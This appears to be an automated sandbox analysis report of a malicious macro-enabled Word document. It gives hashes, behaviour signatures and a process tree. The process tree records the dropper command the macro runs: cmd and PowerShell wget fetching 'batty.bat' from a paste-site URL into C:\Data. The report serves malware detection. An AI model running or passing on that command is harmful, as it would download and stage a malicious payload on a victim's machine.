Overview

overview

10

Static

static

8

539ffa888e...2.docm

windows7-x64

10

539ffa888e...2.docm

windows10-2004-x64

Analysis

  • max time kernel
    144s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    19-12-2023 15:47

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    539ffa888e54851b971f1f5d92f75f72.docm

  • Size

    96KB

  • MD5

    539ffa888e54851b971f1f5d92f75f72

  • SHA1

    05426efcdfb55bda58c9901095c5d685b142e65c

  • SHA256

    e636d49d8e2ecb81e08a6d303ee2d07172a105566e68a113cb0cd2438dc40508

  • SHA512

    d15bc949037234d46a89d8ffaac83a6aac7a01628a5ca30250040d2fe516dfcf708b57a9be697458545c5a206ee44087d995b35080949036b48ad553cf00c871

  • SSDEEP

    1536:jA4ru4Lo30qCR3FU7lN9YDS47wWUyTiedpdMXqgZeNiufpBb/v:jA4pLoLCR3ulN9YJTUyGUM6NiufpBbn

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
    adwarespyware
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\539ffa888e54851b971f1f5d92f75f72.docm"
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2212
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /cpowershell wget -O C:\Data\batty.bat https://paste.c-net.org/BustinBeady
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2428
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c mkdir C:\Data
      2⤵
      • Process spawned unexpected child process
      PID:2980
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell wget -O C:\Data\batty.bat https://paste.c-net.org/BustinBeady
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2836

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2212-0-0x000000002FD61000-0x000000002FD62000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2212-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2212-2-0x000000007161D000-0x0000000071628000-memory.dmp

    Filesize

    44KB

    Download

  • memory/2212-7-0x0000000005100000-0x0000000005200000-memory.dmp

    Filesize

    1024KB

    Download

  • memory/2212-16-0x000000007161D000-0x0000000071628000-memory.dmp

    Filesize

    44KB

    Download

  • memory/2212-17-0x0000000005100000-0x0000000005200000-memory.dmp

    Filesize

    1024KB

    Download

  • memory/2836-10-0x000000006AF80000-0x000000006B52B000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/2836-14-0x0000000002870000-0x00000000028B0000-memory.dmp

    Filesize

    256KB

    Download

  • memory/2836-13-0x0000000002870000-0x00000000028B0000-memory.dmp

    Filesize

    256KB

    Download

  • memory/2836-12-0x0000000002870000-0x00000000028B0000-memory.dmp

    Filesize

    256KB

    Download

  • memory/2836-11-0x000000006AF80000-0x000000006B52B000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/2836-15-0x000000006AF80000-0x000000006B52B000-memory.dmp

    Filesize

    5.7MB

    Download